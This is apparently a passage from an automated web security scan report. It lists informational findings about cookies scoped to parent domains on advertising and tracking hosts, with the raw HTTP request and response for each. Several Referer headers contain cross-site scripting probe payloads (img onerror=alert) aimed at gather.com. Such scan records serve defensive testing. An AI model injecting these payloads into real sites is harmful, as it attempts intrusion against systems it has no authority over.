Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDcyNjCycjNzcAJwJN0Aw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Tue, 14-Sep-2021 16:23:04 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 3252


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_top">
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
12.80. http://d.agkn.com/iframe!t=747!  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.agkn.com
Path:   /iframe!t=747!

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe!t=747!?ct=US&st=TX&ac=214&zp=75207&bw=4&dma=102&city=13290&che=1503492&ent=5621714,65464024,242752145,41491013 HTTP/1.1
Host: d.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5019.284127.DBGVIDEONETWORK/B5621714;sz=1x1;pc=[TPAS_ID];click=;ord=3597907?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:39:39 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 239
Date: Sat, 17 Sep 2011 16:39:39 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<meta http-equiv="pragma" content="no-cache">

</head>

<body style="border: 0; margin:
...[SNIP]...
12.81. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/9033442320916087634/mchpid/9/url/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dm/mkt/4/mpid//mpuid/9033442320916087634/mchpid/9/url/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/9033442320916087634/mchpid/9/url/ HTTP/1.1
Host: d.p-td.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: uid=3716466541868853559

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3716466541868853559; Domain=.p-td.com; Expires=Thu, 15-Mar-2012 16:42:10 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sat, 17 Sep 2011 16:42:09 GMT

GIF89a.............!.......,...........D..;
12.82. http://d.p-td.com/r/du/id/L21rdC80L3NwaWQvMQ/rnd//url/http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2800%3Fid=PARTNER_UUID  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/du/id/L21rdC80L3NwaWQvMQ/rnd//url/http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2800%3Fid=PARTNER_UUID

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/du/id/L21rdC80L3NwaWQvMQ/rnd//url/http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2800%3Fid=PARTNER_UUID HTTP/1.1
Host: d.p-td.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2187?ret=html&phint=section%3Dhp&phint=__bk_t%3DTeen%20Fashion%20%E2%80%93%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%E2%80%93%20ELLEgirl.com&phint=__bk_k%3Dfashion%20online%2C%20girl%20stuff%2C%20fashion%20magazine%2C%20teen%20fashion%20magazine%2C%20young%20movie%20star%2C%20celebrity%20gossip%20girl%2C%20teen%20girl%20gossip%2C%20teen%20blogs&limit=4&r=92044374
Cookie: uid=3716466541868853559

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3716466541868853559; Domain=.p-td.com; Expires=Thu, 15-Mar-2012 16:35:40 GMT; Path=/
Location: http://d.turn.com/r/dm/mkt/4/mpid//mpuid/3716466541868853559/nu/n/url/http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2800%3Fid%3D3716466541868853559
Content-Length: 0
Date: Sat, 17 Sep 2011 16:35:39 GMT

12.83. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzcxNjkzMS90LzI/dpuid/0158d64682f06bf8972b02c9875954d9  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.turn.com
Path:   /r/dd/id/L2NzaWQvMS9jaWQvMzcxNjkzMS90LzI/dpuid/0158d64682f06bf8972b02c9875954d9

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dd/id/L2NzaWQvMS9jaWQvMzcxNjkzMS90LzI/dpuid/0158d64682f06bf8972b02c9875954d9 HTTP/1.1
Host: d.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9tYXAubWVkaWE2ZGVncmVlcy5jb20vb3Jic2Vydi9oYnBpeD9waXhJZD02MjQ5JnBjdj00NyZwdGlkPTEwMiZ0cHY9MDAmdHB1PTAxNThkNjQ2ODJmMDZiZjg5NzJiMDJjOTg3NTk1NGQ5IiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2QudHVybi5jb20vci9kZC9pZC9MMk56YVdRdk1TOWphV1F2TXpjeE5qa3pNUzkwTHpJL2RwdWlkLzAxNThkNjQ2ODJmMDZiZjg5NzJiMDJjOTg3NTk1NGQ5IiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0wMTU4ZDY0NjgyZjA2YmY4OTcyYjAyYzk4NzU5NTRkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2NtLmcuZG91YmxlY2xpY2submV0L3BpeGVsP25pZD1leGVsYXRlJmo9MCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9waXhlbC5tYXRodGFnLmNvbS9kYXRhL2ltZz9tdF9pZD0xMDA3MzgmbXRfZGNpZD0zODImdjE9JnYyPSZ2Mz0mczE9JnMyPSZzMyIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=270f3051e489add843c2c665150bbcc2
Cookie: uid=9033442320916087634; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C1%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C2%7C12%7C1001%7C1004%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15202%7C15202%7C15202%7C15223%7C15202%7C15202%7C15202%7C15194%7C15202%7C15202%7C15202%7C15202%7C15202%7C15202%7C15194%7C15202%7C15194%7C15194%7C15202%7C15202%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15202; rv=1; fc=xFsVg2N5BLRd3913bzR8lbdsz0uhFmslucaZ7Jr3mb45MUavfnaJp-qRT1nS-_kGC4aSOgkXjG13Wq25-lwlCD18zri1103r8NJl4Sm4Yb4O80RBhSgX-D3DVkBBvzpfNjvVPfh6F_xUBn8aeyghtRS-_grHJMquJlAgZxTfBk0TLhIyApmoDuGDhqzDr2b9kZEWsMxS9P5cnP5iZn1K9R8mQIq3knkBTuwivM4IAjc

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=9033442320916087634; Domain=.turn.com; Expires=Thu, 15-Mar-2012 16:35:40 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sat, 17 Sep 2011 16:35:40 GMT

GIF89a.............!.......,...........D..;
12.84. http://d.turn.com/r/dm/mkt/4/mpid//mpuid/3716466541868853559/nu/n/url/http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2800%3Fid%3D3716466541868853559  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.turn.com
Path:   /r/dm/mkt/4/mpid//mpuid/3716466541868853559/nu/n/url/http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2800%3Fid%3D3716466541868853559

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/3716466541868853559/nu/n/url/http%3A%2F%2Ftags.bluekai.com%2Fsite%2F2800%3Fid%3D3716466541868853559 HTTP/1.1
Host: d.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2187?ret=html&phint=section%3Dhp&phint=__bk_t%3DTeen%20Fashion%20%E2%80%93%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%E2%80%93%20ELLEgirl.com&phint=__bk_k%3Dfashion%20online%2C%20girl%20stuff%2C%20fashion%20magazine%2C%20teen%20fashion%20magazine%2C%20young%20movie%20star%2C%20celebrity%20gossip%20girl%2C%20teen%20girl%20gossip%2C%20teen%20blogs&limit=4&r=92044374
Cookie: uid=9033442320916087634; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C1%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C2%7C12%7C1001%7C1004%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15202%7C15202%7C15202%7C15223%7C15202%7C15202%7C15202%7C15194%7C15202%7C15202%7C15202%7C15202%7C15202%7C15202%7C15194%7C15202%7C15194%7C15194%7C15202%7C15202%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15202; rv=1; fc=xFsVg2N5BLRd3913bzR8lbdsz0uhFmslucaZ7Jr3mb45MUavfnaJp-qRT1nS-_kGC4aSOgkXjG13Wq25-lwlCD18zri1103r8NJl4Sm4Yb4O80RBhSgX-D3DVkBBvzpfNjvVPfh6F_xUBn8aeyghtRS-_grHJMquJlAgZxTfBk0TLhIyApmoDuGDhqzDr2b9kZEWsMxS9P5cnP5iZn1K9R8mQIq3knkBTuwivM4IAjc

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=9033442320916087634; Domain=.turn.com; Expires=Thu, 15-Mar-2012 16:35:41 GMT; Path=/
Location: http://tags.bluekai.com/site/2800?id=3716466541868853559
Content-Length: 0
Date: Sat, 17 Sep 2011 16:35:40 GMT

12.85. http://d7.zedo.com/bar/v16-507/d3/jsc/gl.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-507/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-507/d3/jsc/gl.js?mLs5ThcyantsGCRD8ld6EMRU~080311 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=108;s=23;d=9;w=300;h=250;l=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBv5EW4c10TvnKJYHEjQSIhYGOCbjvnLsCAAAAEAEgADgAWIDJ4IomYMkGggEXY2EtcHViLTM4Nzc4Mzk5OTA4ODM1NDSyAQ53d3cuZ2F0aGVyLmNvbboBCWdmcF9pbWFnZcgBCdoBpgFodHRwOi8vd3d3LmdhdGhlci5jb20vNDI2ZDglM0NpbWclMjBzcmMlM0RhJTIwb25lcnJvciUzRGFsZXJ0KDEpJTNFMzFiN2M2MDY1ZDY3YWRhOWQ_cmVjZW50SWQ9MTY4ODg0OTg4OTI0MTk2MyZxdWFsaXR5Q29tbWVudFdpZHRoPTM1MCZ1cmw9aHR0cDovL3d3dy5nYXRoZXIuY29tJTJGJl894AECwAIC4AIA6gIPNjQ5Ni9nYXRoZXIuY29t-ALw0R6AAwGQA9AFmAPgA6gDAeAEAaAGFg%26num%3D0%26sig%3DAOD64_32XMtgfOze2kI-VZyCpPKOdmdRqw%26client%3Dca-pub-3877839990883544%26adurl%3D
Cookie: FFgeo=5386156; ZFFBbh=977B826,20|633_962#7Z695_955#5Z332_950#4; ZEDOIDA=mLs5ThcyantsGCRD8ld6EMRU~080311; ZFFAbh=946B826,20|332_950#369Z695_955#374Z633_962#381; FFAbh=950B305,20|145_2#371Z494_1#392Z458_1#371:809,20|10_1#365Z3_1#392; FFBbh=962B305,20|145_2#3Z494_1#37Z458_1#0:809,20|10_1#0Z3_1#15; FFMCap=2457960B933,196008:826,114248|0,1#0,24:1,1#0,24; PI=h842216Za680391Zc826000471,826000471Zs318Zt1246; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 454
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Sun, 16 Sep 2012 17:04:53 GMT;domain=.zedo.com;path=/;
ETag: "aa1bac-616-4accb5a68d180"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=382888
Expires: Thu, 22 Sep 2011 03:26:21 GMT
Date: Sat, 17 Sep 2011 17:04:53 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var zzl='en-us';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...
12.86. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=0&s=1&l=1&t=e&f=1&e=1 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1432
Cookie: FFgeo=5386156; ZFFBbh=990B826,20|633_962#7Z695_955#5Z332_950#4; ZEDOIDA=mLs5ThcyantsGCRD8ld6EMRU~080311; ZFFAbh=946B826,20|332_950#369Z695_955#374Z633_962#381; FFAbh=950B305,20|145_2#371Z494_1#392Z458_1#371:809,20|10_1#365Z3_1#392; FFBbh=962B305,20|145_2#3Z494_1#37Z458_1#0:809,20|10_1#0Z3_1#15; FFMCap=2457960B933,196008:826,114248:1432,215162|0,15#0,24:1,1#0,24:0,15#0,24; PI=h842216Za680391Zc826000471,826000471Zs318Zt1246; ZEDOIDX=21; FFcat=933,56,15:826,616,14:1432,1,14:1302,108,9; FFad=0:0:0:0; aps=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: ZFFAbh=946B826,20|633_962#381Z695_955#374Z332_950#369;expires=Fri, 16 Dec 2011 16:44:17 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=990B826,20|633_962#7Z695_955#5Z332_950#4;expires=Sun, 16 Sep 2012 16:44:17 GMT;domain=.zedo.com;path=/;
ETag: "1822b34-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=54170
Expires: Sun, 18 Sep 2011 07:47:07 GMT
Date: Sat, 17 Sep 2011 16:44:17 GMT
Connection: close

GIF89a.............!.......,...........D..;


12.87. http://hearstmagazines.112.2o7.net/b/ss/hmagglobal/1/H.22.1--NS/0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearstmagazines.112.2o7.net
Path:   /b/ss/hmagglobal/1/H.22.1--NS/0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/hmagglobal/1/H.22.1--NS/0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: hearstmagazines.112.2o7.net
Cookie: s_vi_bgkmmfehkf=[CS]v4|273A51E185011CD7-4000011320135C83|4E74AC5F[CE]

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:21:12 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_bgkmmfehkf=[CS]v4|273A51E185011CD7-4000011320135C83|4E74C8F8[CE]; Expires=Thu, 15 Sep 2016 16:21:12 GMT; Domain=.2o7.net; Path=/
Location: http://hearstmagazines.112.2o7.net/b/ss/hmagglobal/1/H.22.1--NS/0?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Fri, 16 Sep 2011 16:21:12 GMT
Last-Modified: Sun, 18 Sep 2011 16:21:12 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www404
Content-Length: 0
Content-Type: text/plain

12.88. http://ib.adnxs.com/getuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http%3A//um.simpli.fi/an%3Fappnexus_uid%3D%24UID HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg+src=a+onerror=alert(%22XSS%22)%3E31b7c6065d67ada9d
Cookie: uuid2=2230616255569715877; anj=Kfu=8fG10Qe8*@3?0P(*AuB-u**g1:XICglEhzWBOB-=z^rny5ImAJeF#G62Gp6$y9YIv(mX*Z/D55YJqe+'2=OxE_3ED!d6wOr.*iio5>4Vg5l_hglrl+AvGHi6Z)5a_B@?yx0$+:gkM[7r23-3s^Ne)Z+sWCTMk3)zm]F9+7$EJ'Y8qX?T$q!72Es=lT:IHl#3W:T5FI6'86OTAM$=mJLcw_!Y1ABqx3k(-6uPG>][nqRvuEp#L>vorv:^ZekOVZ+wR!zf.wB<rG$GxjI#<Uddw$D?IvU09L'-_RZ6#0:[?f@Quw(ug7tpC[<d`eD<)nAQkhWMBa!:e3F[wQYDSmm]smtB`0Mas8%9Z6AaYTYJUMte*wNMWV[*k[_4(NR*MM3kVbusMAqvdOxS!=>.n4[9yco0Ya[!Y`*Gl=:)oe7z]<rnc/r[C#`os5w=4nKa0uDgAZ73U8R406i8@vRN2Y^eX:^8JHEiW_+:x:/sDPc?Td.; icu=ChIIrLwCEAoYASABKAEw1N_S8wQKEgiZ1gIQChgBIAEoATCJ4NLzBBCJ4NLzBBgB; sess=1

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 16:44:03 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2230616255569715877; path=/; expires=Fri, 16-Dec-2011 16:44:03 GMT; domain=.adnxs.com; HttpOnly
Location: http://um.simpli.fi/an?appnexus_uid=2230616255569715877
Date: Sat, 17 Sep 2011 16:44:03 GMT
Content-Length: 0

12.89. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?member=514&add_code= HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/
Cookie: uuid2=2230616255569715877; anj=Kfw)(7a1s>)_aT4AZ7E(=g)'`'AQ(eiJ(]9v%cL'l?8TFj7@=]<[An7B/s<k1#fc#<@DNb#?ZVTiPam-DcN!a?l!Ial@Jo$85Th.hn+fFhCq/i*SOXpdc?WEqx9N[Hr`ebCULQ=K)mQujczZHM<wWw]D'u8'3Aa.Yhu`@I)Z#5YmM%^Q0?kXiRg]M:8rLK*cGBH)n^UKCZc^YiT%?agUCp_T[x_X7p4:6r.98Fey**bd3]8P6aH+78'SZUHQ5[-j1!NOw/U+YWutaeC+bhg.fo9]>LA#a=+ZclWjJ]?Yf%9Ge?*RvP6Ud(tg>nd1kFVx(@cL-mz+Q@r#pJzkSf'?J*u>lVWV<9pJ55CLjC>:mUrPRoQ+t>9`(jCfyNWOhS1RGthS4vqyl.lkmjtcS:V6AO-OO8)+DQQ'%M[qh]f9D-A*)nRQcx9v)hPym(iD-KOdo1t$mCW]]Q_aL]q0/QH@4)<af]TO0sdt@wa6tZ^.%DCihDZc_yW!M1wP:; icu=ChIIrLwCEAoYASABKAEw1N_S8wQKEgiZ1gIQChgBIAEoATCJ4NLzBBCJ4NLzBBgB; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 16:57:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=9223372036854775807; path=/; expires=Fri, 16-Dec-2011 16:57:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG10Qe8*@3?0P(*AuB-u**g1:XICglEhzWBOB-=z^rny5ImAJeF#G62Gp6$y9YIv(mX*Z/D55YJqe+'2=OxE_3ED!d6wOr.*iio5>4Vg5l_hglrl+AvGHi6Z)5a_B@?yx0$+:gkM[7r23-3s^Ne)Z+sWCTMk3)zm]F9+7$EJ'Y8qX?T$q!72Es=lT:IHl#3W:T5FI6'86OTAM$=mJLcw_!Y1ABqx3k(-6uPG>][nqRvuEp#L>vorv:^ZekOVZ+wR!zf.wB<rG$GxjI#<Uddw$D?IvU09L'-_RZ6#0:[?f@Quw(ug7tpC[<d`eD<)nAQkhWMBa!:e3F[wQYDSmm]smtB`0Mas8%9Z6AaYTYJUMte*wNMWV[*k[_4(NOkFM^DWXLw=cKwP#OgNJZ3u+@3QoIH0k@NK1WarJX[uDYOB0K:aRKj1-lIKg47Xs5KTL4%lBYUtEj+)-FY^wGP.?k_76m.(+`r>2v-yYDE9oXW%TR; path=/; expires=Fri, 16-Dec-2011 16:57:19 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Sat, 17 Sep 2011 16:57:19 GMT

GIF89a.............!.......,........@..L..;
12.90. http://idpix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idpix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=5392 HTTP/1.1
Host: idpix.media6degrees.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch
